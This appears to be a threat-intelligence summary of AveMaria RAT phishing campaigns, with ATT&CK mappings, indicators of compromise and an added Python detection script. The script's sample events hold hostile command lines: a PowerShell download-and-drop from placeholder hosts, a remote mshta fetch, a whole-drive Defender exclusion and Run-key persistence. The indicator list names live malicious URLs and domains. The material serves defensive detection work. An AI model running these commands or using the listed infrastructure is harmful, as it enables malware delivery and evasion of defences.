Dynamic Approaches seen in AveMaria’s Distribution Strategy

ThreatLabz tracked the evolution of AveMaria's distribution campaigns across seven case studies in 2022, showing multiple delivery formats and changing execution steps used to evade detection. The infection chain continues to be updated, including new techniques such as a custom downloader and type casting to decrypt the payload. #AveMaria #ThreatLabz #VHDXCampaign #AUloader_campaign #SerbianCampaign #UkraineISO

Key points

  • AveMaria is a Remote Access Trojan (RAT) infostealer with remote camera control and privilege escalation capabilities.
  • Researchers observed significant changes to AveMaria’s execution stages and TTPs over the last six months.
  • Attacks typically begin with phishing emails delivering the malicious payloads (e.g., .vhdx, ISO, or VBScript-based packages).
  • Recent variants decrypt, or decrypt and load, their payloads in memory, in some cases using RC4-based encryption and C2 communication over non-HTTP channels.
  • A new variation uses a custom downloader that employs type casting to reconstruct and decrypt the final AveMaria payload in memory.
  • Case studies cover diverse formats: .vhd(x) campaigns, AUloader, Serbian eID phishing, Ukrainian ISO phishing, VBScript/AutoIt chains, and MSHTA-based delivery.
  • Zscaler's coverage section lists detection names such as PS.Downloader.AveMaria for the different campaigns.

MITRE Techniques

  • [T1566.001] Spearphishing Attachment – “phishing emails impersonating the Russian government targeted Kazakhstan officials with a malicious .vhdx file disguised as a fake meeting notice.” – Used to deliver initial payloads via email attachments.
  • [T1105] Ingress Tool Transfer – “Stage 1: Custom downloader retrieves an encrypted file from a third party file sharing website and after downloading and decrypting in memory, it executes the decrypted version of the retrieved payload, which is in PE format.”
  • [T1059.001] PowerShell – “Stage 1: VBScript … calls out powershell.exe with commands consisting of two downloading urls.”
  • [T1059.005] VBScript – “The vbscript … on execution, calls out powershell.exe with commands consisting of two downloading urls.”
  • [T1218.005] Mshta – “The bundled HTA file downloads the end payload via mshta.exe.”
  • [T1095] Non-Application Layer Protocol – “C2 communications on non-HTTP protocol, after decrypting its C2 connection using RC4.”
  • [T1547.001] Registry Run Keys/Startup Folder – “adds run key in the registry to achieve persistence.”
  • [T1055] Process Injection – “Stage 2: Second stage DLL … leads to process injection of malware into a legitimate file.”
  • [T1113] Screen Capture – “remote camera control” capability described as part of AveMaria.
  • [T1562.001] Impair Defenses – “exclude the whole drive prior to the initialization of the copied file for further infection, via powershell command.”
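As an added example, not code from the blog or this summary, the script below turns the behaviours quoted above into simple process-creation checks and runs them over constructed sample events. It assumes the "exclude the whole drive" step is done with Defender's Add-MpPreference -ExclusionPath cmdlet (the excerpt only says "via powershell command"), and the hostnames and paths in the sample events are placeholders.

```python
import re

# Constructed sample process-creation events (Sysmon Event ID 1 style); not real telemetry.
EVENTS = [
    # VBScript host spawning PowerShell with two download URLs (T1059.005 -> T1059.001)
    {"parent": "wscript.exe", "image": "powershell.exe",
     "cmd": "powershell -w hidden (New-Object Net.WebClient).DownloadString('http://PLACEHOLDER-A/a.txt');"
            "(New-Object Net.WebClient).DownloadFile('http://PLACEHOLDER-B/b.exe','C:\\Users\\Public\\b.exe')"},
    # mshta.exe pulling the next stage from a URL (T1218.005)
    {"parent": "explorer.exe", "image": "mshta.exe", "cmd": "mshta http://PLACEHOLDER-C/stage.hta"},
    # Whole-drive Defender exclusion; Add-MpPreference is an assumption, not named by the blog (T1562.001)
    {"parent": "cmd.exe", "image": "powershell.exe", "cmd": "powershell Add-MpPreference -ExclusionPath C:\\"},
    # Run-key persistence (T1547.001)
    {"parent": "powershell.exe", "image": "reg.exe",
     "cmd": "reg add HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run /v upd /t REG_SZ /d C:\\Users\\Public\\images.exe"},
    # Benign control event that should not match anything
    {"parent": "explorer.exe", "image": "powershell.exe", "cmd": "powershell Get-Process"},
]

URL_RE = re.compile(r"https?://[^\s'\"]+", re.I)
SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}
# Drive-root exclusion: a bare drive letter such as C:\ as the exclusion path
DRIVE_EXCL_RE = re.compile(r"Add-MpPreference\s+-ExclusionPath\s+['\"]?[A-Za-z]:\\?['\"]?(\s|$)", re.I)
RUN_KEY_RE = re.compile(r"\\CurrentVersion\\Run\b", re.I)

def classify(ev):
    """Return the list of page-described behaviours a single event matches."""
    hits = []
    img, parent, cmd = ev["image"].lower(), ev["parent"].lower(), ev["cmd"]
    urls = URL_RE.findall(cmd)
    if parent in SCRIPT_HOSTS and img == "powershell.exe" and len(urls) >= 2:
        hits.append("T1059.005->T1059.001: script host spawned PowerShell with two download URLs")
    if img == "mshta.exe" and urls:
        hits.append("T1218.005: mshta.exe fetching remote content")
    if img == "powershell.exe" and DRIVE_EXCL_RE.search(cmd):
        hits.append("T1562.001: whole-drive Defender exclusion")
    if img in {"reg.exe", "powershell.exe"} and RUN_KEY_RE.search(cmd):
        hits.append("T1547.001: Run key persistence")
    return hits

def scan(events):
    """Map event index -> matched behaviours, keeping only events with at least one hit."""
    return {i: classify(ev) for i, ev in enumerate(events) if classify(ev)}

if __name__ == "__main__":
    for idx, hits in scan(EVENTS).items():
        print(idx, EVENTS[idx]["image"], hits)
```

The checks are deliberately narrow; in production they would be enriched with parent-chain context (e.g. the ISO/VHDX mount or shortcut launch that precedes the script host).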

Indicators of Compromise (IOCs)

  • [MD5] 18e7c1ff7bbb4816e53315546397543b, 56d1e9d11a8752e1c06e542e78e9c3e4, 3a7ba1f6f92af9ed43cbd590eb404496, 86c697f7284ecb5c68cd35d26aaf634a
  • [File] Adobe5151.exe (Serbia campaign), gov12.exe (Ukraine ISO campaign), images.exe (Serbia campaign), AveMaria_payload
  • [URL] 45.61.137.32/www.exe, 20.7.14.99/server/dll2.txt, 80.76.51.222/jfgfhhjhgjkj.txt
  • [Domain] pliblu-fax.home-webserver.de, kashbilly.duckdns.org, odessa-gov.ddns.net, sg tmarkets.com
  • [IP] 171.22.30.72
  • [ISO/ZIP] ISO file attachments observed in the Ukraine and Serbia campaigns
  • [Shortcut] 2828f49cde16e65a1bee0c5c44aed8cc (shortcut file involved in the mshta-based flow)

Read more: https://www.zscaler.com/blogs/security-research/dynamic-approachseen-avemarias-distribution-strategy